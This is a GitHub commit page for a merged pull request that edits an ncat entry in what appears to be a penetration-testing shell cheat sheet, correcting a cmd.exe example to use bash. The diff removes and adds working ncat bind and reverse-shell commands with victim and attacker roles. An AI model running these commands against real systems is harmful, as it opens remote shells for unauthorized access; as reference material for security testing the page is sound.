Merge pull request #921 from fjh1997/master

Correction: cmd.exe is part of Windows, not Linux.Use bash instead。
This commit is contained in:
SirBroccoli 2024-08-18 12:59:13 +02:00 committed by GitHub
commit fb88a175f1
No known key found for this signature in database
GPG key ID: B5690EEEBB952194

View file

@ -213,8 +213,8 @@ p.waitFor()
## Ncat
```bash
victim> ncat --exec cmd.exe --allow 10.0.0.4 -vnl 4444 --ssl
attacker> ncat -v 10.0.0.22 4444 --ssl
victim> ncat <ip> <port,eg.443> --ssl -c "bash -i 2>&1"
attacker> ncat -l <port,eg.443> --ssl
```
## Golang